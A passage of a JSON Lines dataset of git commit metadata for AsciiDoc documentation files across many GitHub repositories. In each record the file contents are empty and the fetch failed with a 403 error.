earch","old_file":"docs\/en\/installing-xes.asciidoc","new_file":"docs\/en\/installing-xes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ca6ef633d4164bd094717ee17844df377c1e2405","subject":"Add streaming client capabilities design.","message":"Add streaming client capabilities design.","repos":"reactivity-io\/reactivity-doc","old_file":"streaming-client.adoc","new_file":"streaming-client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reactivity-io\/reactivity-doc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed4c0ff9d076e310c321a0700d123b4b9f9a7b9b","subject":"README","message":"README\n\n Added README\n","repos":"sys4\/chkquota","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sys4\/chkquota.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"944631235df733d491395dcb35621fee2567ece9","subject":"doc: initial checkin","message":"doc: initial checkin","repos":"jhinrichsen\/bazel-wsdl-java-weather-sample,jhinrichsen\/bazel-wsdl-java-weather-sample","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jhinrichsen\/bazel-wsdl-java-weather-sample.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49bfefbe4f37a96c79c470043acd9b7e5b8a3538","subject":"Updated documentation","message":"Updated documentation\n","repos":"resilience4j\/resilience4j,drmaas\/resilience4j,RobWin\/circuitbreaker-java8,RobWin\/javaslang-circuitbreaker,goldobin\/resilience4j,storozhukBM\/javaslang-circuitbreaker,drmaas\/resilience4j,mehtabsinghmann\/resilience4j,resilience4j\/resilience4j,javaslang\/javaslang-circuitbreaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ea2cd4a782bb7d4afe6cdf1c0e49f93f042f1994","subject":"Updated documentation","message":"Updated documentation\n","repos":"drmaas\/resilience4j,RobWin\/javaslang-circuitbreaker,RobWin\/circuitbreaker-java8,resilience4j\/resilience4j,drmaas\/resilience4j,storozhukBM\/javaslang-circuitbreaker,mehtabsinghmann\/resilience4j,resilience4j\/resilience4j,goldobin\/resilience4j,javaslang\/javaslang-circuitbreaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bd9f46a4040b3dba0e89bfb855ce57399f48b55d","subject":"Finishing touches","message":"Finishing touches\n","repos":"GYMY-16\/udi-01-TomasZilinek","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GYMY-16\/udi-01-TomasZilinek.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0e5d6795f713bf036da39ba677cc719798eee5e","subject":"Updated README screencast to use larger image","message":"Updated README screencast to use larger image\n\nLeverages a larger image so the terminal is easier to read at first\nglance.\n","repos":"bkuhlmann\/git-cop,bkuhlmann\/git-cop","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bkuhlmann\/git-cop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d64bb869413ccc089acfc0a1ddb5886d122741eb","subject":"Added Readme (converted from docbook manual)","message":"Added Readme (converted from docbook manual)\n","repos":"jwausle\/cmvn,ToToTec\/cmvn","old_file":"Readme.adoc","new_file":"Readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ToToTec\/cmvn.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d98f0153b4163922ae2f5aeb042575951258119e","subject":"added new documentation file for the groupcommunication","message":"added new documentation file for the groupcommunication\n","repos":"ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1","old_file":"documentation\/groupcom.adoc","new_file":"documentation\/groupcom.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ohaz\/amos-ss15-proj1.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"b22f9d7e86a05c559bffcfd6b897da5bc2aba4ce","subject":"[kudu-jepsen] fixed typo in README.adoc","message":"[kudu-jepsen] fixed typo in README.adoc\n\nFor the kudu-jepsen module, '.\/gradlew' should be run from the\nupper-level (parent) directory (i.e. $KUDU_ROOT\/java).\n\nAlso, updated the wording and path specification for the example\ninvolving the 'sshKeyPath' run-time property.\n\nChange-Id: I01a62d135aad560fa26f7a3ccf746813d3ec279e\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/11932\nTested-by: Kudu Jenkins\nReviewed-by: Hao Hao <99da4db57fde39d3df9f1908299d10b8082bf864@cloudera.com>\n","repos":"helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu","old_file":"java\/kudu-jepsen\/README.adoc","new_file":"java\/kudu-jepsen\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"135231f810598bb5f7a5d00d0687e90e91584294","subject":"deployment to Heroku documented","message":"deployment to Heroku documented\n","repos":"oboehm\/gdv.xport,oboehm\/gdv.xport,oboehm\/gdv.xport","old_file":"doc\/deployment.adoc","new_file":"doc\/deployment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oboehm\/gdv.xport.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"202fdd64c869eb7e1d6084a10fe93f164aa4cedb","subject":"add a section to the manual discussing the command= variable","message":"add a section to the manual discussing the command= variable\n\nThis includes a mention of using cmd \/c on Windows.\nThis would have helped on issue #1070 for example.\n","repos":"martine\/ninja,martine\/ninja,fuchsia-mirror\/third_party-ninja,mgaunard\/ninja,ninja-build\/ninja,mgaunard\/ninja,maruel\/ninja,sgraham\/ninja,ninja-build\/ninja,Maratyszcza\/ninja-pypi,nicolasdespres\/ninja,nafest\/ninja,ndsol\/subninja,nicolasdespres\/ninja,iwadon\/ninja,nico\/ninja,Qix-\/ninja,mydongistiny\/ninja,sxlin\/dist_ninja,bradking\/ninja,juntalis\/ninja,juntalis\/ninja,sgraham\/ninja,mydongistiny\/ninja,ndsol\/subninja,sxlin\/dist_ninja,lizh06\/ninja,nicolasdespres\/ninja,lizh06\/ninja,AoD314\/ninja,atetubou\/ninja,fuchsia-mirror\/third_party-ninja,Qix-\/ninja,martine\/ninja,mohamed\/ninja,vvvrrooomm\/ninja,maruel\/ninja,vvvrrooomm\/ninja,bradking\/ninja,sgraham\/ninja,iwadon\/ninja,Qix-\/ninja,nafest\/ninja,juntalis\/ninja,vvvrrooomm\/ninja,atetubou\/ninja,nico\/ninja,sgraham\/ninja,AoD314\/ninja,ninja-build\/ninja,sxlin\/dist_ninja,nafest\/ninja,nico\/ninja,Maratyszcza\/ninja-pypi,fuchsia-mirror\/third_party-ninja,AoD314\/ninja,martine\/ninja,iwadon\/ninja,sxlin\/dist_ninja,Maratyszcza\/ninja-pypi,maruel\/ninja,mgaunard\/ninja,iwadon\/ninja,nafest\/ninja,moroten\/ninja,mohamed\/ninja,bradking\/ninja,ninja-build\/ninja,juntalis\/ninja,bradking\/ninja,Qix-\/ninja,ndsol\/subninja,sxlin\/dist_ninja,mohamed\/ninja,vvvrrooomm\/ninja,sxlin\/dist_ninja,mohamed\/ninja,AoD314\/ninja,moroten\/ninja,moroten\/ninja,nico\/ninja,Maratyszcza\/ninja-pypi,atetubou\/ninja,ndsol\/subninja,atetubou\/ninja,mydongistiny\/ninja,mgaunard\/ninja,maruel\/ninja,mydongistiny\/ninja,lizh06\/ninja,lizh06\/ninja,nicolasdespres\/ninja,moroten\/ninja,fuchsia-mirror\/third_party-ninja,sxlin\/dist_ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nafest\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"21cc7cac478282075a81418c035b1da1bd3a674a","subject":"converted portal.md to asciidoc format as an experiment","message":"converted portal.md to asciidoc format as an experiment\n\nChange-Id: I5768c8d277273e4a8074602406197daa99c93408\n","repos":"cambridgehackers\/connectal,chenm001\/connectal,csail-csg\/connectal,hanw\/connectal,cambridgehackers\/connectal,cambridgehackers\/connectal,hanw\/connectal,hanw\/connectal,8l\/connectal,csail-csg\/connectal,chenm001\/connectal,chenm001\/connectal,hanw\/connectal,chenm001\/connectal,8l\/connectal,8l\/connectal,csail-csg\/connectal,8l\/connectal,chenm001\/connectal,hanw\/connectal,csail-csg\/connectal,cambridgehackers\/connectal,csail-csg\/connectal,cambridgehackers\/connectal,8l\/connectal","old_file":"doc\/portal.asciidoc","new_file":"doc\/portal.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/csail-csg\/connectal.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d1ef854f302d1260f72e56bd27372846fb76a02","subject":"New Event - ClojureBridge London Sept 2022","message":"New Event - ClojureBridge London Sept 2022\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2022\/clojurebridge-london-sept-2022.adoc","new_file":"content\/events\/2022\/clojurebridge-london-sept-2022.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5ceb7ae37cdfff1a815aa437d618c0ecfe9f6d6b","subject":"Update 2016-01-012-HubPress-CNAME-and-A-Records.adoc","message":"Update 2016-01-012-HubPress-CNAME-and-A-Records.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2016-01-012-HubPress-CNAME-and-A-Records.adoc","new_file":"_posts\/2016-01-012-HubPress-CNAME-and-A-Records.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"555f1536decb986808b229562fbd56bd57c6b7b4","subject":"Update docs with command to create hstore on test db","message":"Update docs with command to create hstore on test db","repos":"pombredanne\/django-hstore,djangonauts\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa8bc7087ef9f8ea205fe1f92313d3d325c72cd6","subject":"Update 2015-08-06-TO-DELE.adoc","message":"Update 2015-08-06-TO-DELE.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-TO-DELE.adoc","new_file":"_posts\/2015-08-06-TO-DELE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e82f16c0d1c0a2a6de42c6ea971a6c6163b8f665","subject":"Update 2017-06-17-Carpets.adoc","message":"Update 2017-06-17-Carpets.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-06-17-Carpets.adoc","new_file":"_posts\/2017-06-17-Carpets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b2a8c0ff7ce6ed932120d64f5f35fab016151d5","subject":"Update 2018-11-08-develop.adoc","message":"Update 2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e32d60fac20430b2c73d39a4269b654df70ef320","subject":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71b7b7b0e43972bff0b4522def025188503ec5e2","subject":"Add another interesting aspect of my PHP approach","message":"Add another interesting aspect of my PHP approach\n","repos":"mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment","old_file":"src\/sections\/01-introduction.adoc","new_file":"src\/sections\/01-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mlocati\/MyDevelopmentEnvironment.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef0542dfec646856a831680ef795c87308deb499","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e90cc3ebc99f56f6a6e89e608a1b7797b416f2b","subject":"Update 2016-02-22-Ground-Zero.adoc","message":"Update 2016-02-22-Ground-Zero.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-02-22-Ground-Zero.adoc","new_file":"_posts\/2016-02-22-Ground-Zero.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6dc1bb5c4050c7b5d195a51fb8573a8a84a6f691","subject":"Update 2017-06-09-Pepper-Amazon-Rekognition.adoc","message":"Update 2017-06-09-Pepper-Amazon-Rekognition.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-09-Pepper-Amazon-Rekognition.adoc","new_file":"_posts\/2017-06-09-Pepper-Amazon-Rekognition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"875e3e0167d8c0038b65c587f1169437bb2e8f0c","subject":"Update 2015-03-27-My-Individualism.adoc","message":"Update 2015-03-27-My-Individualism.adoc","repos":"hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress","old_file":"_posts\/2015-03-27-My-Individualism.adoc","new_file":"_posts\/2015-03-27-My-Individualism.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hinaloe\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bec1b4f6a38624bf04dd751bcab97b0e550bcec","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15ee6f45e053a3de0285872e546a648b95626956","subject":"Update 2016-01-23-XML-Prague-2016.adoc","message":"Update 2016-01-23-XML-Prague-2016.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b646721b6ceac95024d60896225ca36e677bee54","subject":"Update 2016-10-21-opensource-paas.adoc","message":"Update 2016-10-21-opensource-paas.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-21-opensource-paas.adoc","new_file":"_posts\/2016-10-21-opensource-paas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e86db7507954797f1a06ad4bdc7e3a2b0232abee","subject":"Update 2014-05-13-Episode-7-The-Norm-and-Beyond.adoc","message":"Update 2014-05-13-Episode-7-The-Norm-and-Beyond.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2014-05-13-Episode-7-The-Norm-and-Beyond.adoc","new_file":"_posts\/2014-05-13-Episode-7-The-Norm-and-Beyond.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27d54056754d0bd0d0eaea2de5eccde50665ae71","subject":"Update 2015-10-14-Chapters-plugin-for-WordPress.adoc","message":"Update 2015-10-14-Chapters-plugin-for-WordPress.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-10-14-Chapters-plugin-for-WordPress.adoc","new_file":"_posts\/2015-10-14-Chapters-plugin-for-WordPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"103d559b93b0aa41e80bec8658314726347e1b46","subject":"Update 2017-03-16-Installing-Tomcat-8-on-RHEL-6.adoc","message":"Update 2017-03-16-Installing-Tomcat-8-on-RHEL-6.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-03-16-Installing-Tomcat-8-on-RHEL-6.adoc","new_file":"_posts\/2017-03-16-Installing-Tomcat-8-on-RHEL-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1f4d92c019358f170f62ebfcdf460b6022371bc","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/01\/07\/deref.adoc","new_file":"content\/news\/2022\/01\/07\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5c924cb9b04ad32430a317f9f50de0e00bd87889","subject":"y2b create post 4 Year Old Discovers Sega Genesis","message":"y2b create post 4 Year Old Discovers Sega Genesis","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-06-09-4-Year-Old-Discovers-Sega-Genesis.adoc","new_file":"_posts\/2014-06-09-4-Year-Old-Discovers-Sega-Genesis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23c179427c659c3d6e067c34136ee4de8352fb1a","subject":"another minor change","message":"another minor change\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"packet_builder_yaml.asciidoc","new_file":"packet_builder_yaml.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"abb18fe94a01a7d88396299a6598e92c9774ec52","subject":"Create OSX.adoc","message":"Create OSX.adoc","repos":"Abdennebi\/ProTips","old_file":"OSX.adoc","new_file":"OSX.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Abdennebi\/ProTips.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"822a3ed024da0a703353bf471a8ccf93fa080949","subject":"Update 2016-11-18-Sass-Awesome.adoc","message":"Update 2016-11-18-Sass-Awesome.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"390d24a1f36f5bed0c3a70e1e8082e8fd9ea58ae","subject":"Update 20161110-1328-have-fun.adoc","message":"Update 20161110-1328-have-fun.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/20161110-1328-have-fun.adoc","new_file":"_posts\/20161110-1328-have-fun.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38e4b28c8b66dc20b5290028be0e4a8dca17d92b","subject":"Update 2016-04-02-Deneme-Yazi.adoc","message":"Update 2016-04-02-Deneme-Yazi.adoc","repos":"BulutKAYA\/bulutkaya.github.io,BulutKAYA\/bulutkaya.github.io,BulutKAYA\/bulutkaya.github.io,BulutKAYA\/bulutkaya.github.io","old_file":"_posts\/2016-04-02-Deneme-Yazi.adoc","new_file":"_posts\/2016-04-02-Deneme-Yazi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BulutKAYA\/bulutkaya.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94bea5c0f2846df7c78ed2dfaa78b1b198c92950","subject":"Update 2016-08-23-MSVC-P40dll.adoc","message":"Update 2016-08-23-MSVC-P40dll.adoc","repos":"aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io","old_file":"_posts\/2016-08-23-MSVC-P40dll.adoc","new_file":"_posts\/2016-08-23-MSVC-P40dll.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aspick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bdfeeb4250418441907eadbd02619e8c18aee90","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"815a4e3e95bb35b84c373f02749e224c80d81972","subject":"Update 2018-01-27-Google-Home.adoc","message":"Update 2018-01-27-Google-Home.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-27-Google-Home.adoc","new_file":"_posts\/2018-01-27-Google-Home.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf26631f8bbb3616c4a0e8aa6dfe10e42e3761ab","subject":"Add CIP for calling procedures","message":"Add CIP for calling procedures\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2015-06-24-call-procedures.adoc","new_file":"cip\/CIP2015-06-24-call-procedures.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4c26cd43cc02c9db860108c2bd89cc4d7cc6b49c","subject":"Update 2015-08-30-HubPress.adoc","message":"Update 2015-08-30-HubPress.adoc","repos":"rizalp\/rizalp.github.io,rizalp\/rizalp.github.io,rizalp\/rizalp.github.io","old_file":"_posts\/2015-08-30-HubPress.adoc","new_file":"_posts\/2015-08-30-HubPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rizalp\/rizalp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e055b5fff849de284b01ddbc5533bd451930b0aa","subject":"up news","message":"up news\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_posts\/2017-09-01-new-website.adoc","new_file":"_posts\/2017-09-01-new-website.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09f98fdb91550a477dbbc78bd96a6fe53f38fe74","subject":"enhanced \"improvement-backlog\", moved to its own file, first version of 